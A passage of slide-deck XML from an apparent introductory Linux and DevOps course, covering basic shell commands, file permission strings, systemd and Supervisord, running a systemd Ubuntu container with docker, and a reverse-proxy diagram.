              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3350">
                <a:solidFill>
                  <a:srgbClr val="111111"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> apt-get </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3350">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>upgrade</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3350">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>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Basic Linux Commands</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="777" name="Google Shape;777;p137"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="896200" y="1101300"/>
            <a:ext cx="7256400" cy="3589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2498">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PWD = Present Working Directory</a:t>
            </a:r>
            <a:endParaRPr sz="2498">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="935"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2498">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ls -al </a:t>
            </a:r>
            <a:endParaRPr sz="2498">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="935"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2498">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	Permission String</a:t>
            </a:r>
            <a:endParaRPr sz="2498">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="935"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2498">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="935"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2498">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        drwxrwxrwx -&gt; directory</a:t>
            </a:r>
            <a:endParaRPr sz="2498">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="935"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2498">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -rwxrwxrwx   -&gt; file</a:t>
            </a:r>
            <a:endParaRPr sz="2498">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="935"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2498">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> lrwxrwxrwx  -&gt; Symbolic links (Shortcut link)</a:t>
            </a:r>
            <a:endParaRPr sz="2498">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buSzPts val="935"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2230">
              <a:solidFill>
                <a:srgbClr val="6AA84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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="57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Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="4800">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Process Managers</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4800">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="783" name="Google Shape;783;p138"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1880750" y="1533975"/>
            <a:ext cx="5259900" cy="2673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603250" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="5900"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="5900">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Systemd </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="5900">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-603250" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="5900"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="5900">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Supervisord</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="5900">
              <a:solidFill>
                <a:srgbClr val="6AA84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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1159675"/>
            <a:ext cx="8520600" cy="572700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="990"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3670">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>What is systemd?</a:t>
            </a:r>
            <a:endParaRPr sz="4120">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="789" name="Google Shape;789;p139"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="375700" y="2001425"/>
            <a:ext cx="8520600" cy="1194000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Systemd is a linux initialization system and service manager that manages all </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>linux services (Demons)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3000">
              <a:solidFill>
                <a:srgbClr val="6AA84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40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="181725" y="45550"/>
            <a:ext cx="8520600" cy="572700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://hub.docker.com/r/jrei/systemd-ubuntu</a:t>
            </a:r>
            <a:endParaRPr sz="4120">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="795" name="Google Shape;795;p140"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="595300" y="692550"/>
            <a:ext cx="8194800" cy="4328100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-307975" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="2300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="393F49"/>
              </a:buClr>
              <a:buSzPts val="1250"/>
              <a:buFont typeface="Roboto"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1250">
                <a:solidFill>
                  <a:srgbClr val="393F49"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Run the container as a daemon</a:t>
            </a:r>
            <a:endParaRPr sz="1250">
              <a:solidFill>
                <a:srgbClr val="393F49"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="175000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="393F49"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F5F5F5"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>docker run -d --name systemd-ubuntu --tmpfs /tmp --tmpfs /run --tmpfs /run/lock -v /sys/fs/cgroup:/sys/fs/cgroup:ro jrei/systemd-ubuntu</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="393F49"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F5F5F5"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="175000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1250">
                <a:solidFill>
                  <a:srgbClr val="393F49"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>or if it doesn't work</a:t>
            </a:r>
            <a:endParaRPr sz="1250">
              <a:solidFill>
                <a:srgbClr val="393F49"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="175000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="393F49"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F5F5F5"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>docker run -d --name systemd-ubuntu --privileged -v /sys/fs/cgroup:/sys/fs/cgroup:ro jrei/systemd-ubuntu</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="393F49"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F5F5F5"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-307975" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="2300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="393F49"/>
              </a:buClr>
              <a:buSzPts val="1250"/>
              <a:buFont typeface="Roboto"/>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1250">
                <a:solidFill>
                  <a:srgbClr val="393F49"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Enter to the container</a:t>
            </a:r>
            <a:endParaRPr sz="1250">
              <a:solidFill>
                <a:srgbClr val="393F49"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="175000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="393F49"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F5F5F5"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>docker exec -it systemd-ubuntu sh</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="393F49"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F5F5F5"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-307975" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="2300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="393F49"/>
              </a:buClr>
              <a:buSzPts val="1250"/>
              <a:buFont typeface="Roboto"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1250">
                <a:solidFill>
                  <a:srgbClr val="393F49"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Remove the container</a:t>
            </a:r>
            <a:endParaRPr sz="1250">
              <a:solidFill>
                <a:srgbClr val="393F49"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="175000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="393F49"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F5F5F5"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>docker rm -f systemd-ubuntu</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>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41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="262163" y="179700"/>
            <a:ext cx="8520600" cy="76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500">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Reverse Proxy</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3300">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="801" name="Google Shape;801;p141"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="20470" l="-609" r="2348" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="715900" y="867075"/>
            <a:ext cx="7613125" cy="3409350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="802" name="Google Shape;802;p141"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7920525" y="1106900"/>
            <a:ext cx="900600" cy="5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App1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8080</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="803" name="Google Shape;803;p141"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8100800" y="3301675"/>
            <a:ext cx="900600" cy="6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App2</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8081</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="804" name="Google Shape;804;p141"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1560800" y="3957175"/>
            <a:ext cx="4818600" cy="8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4"/>
              </a:rPr>
              <a:t>http://app1:vishalmahawar.shop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -&gt; IP:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
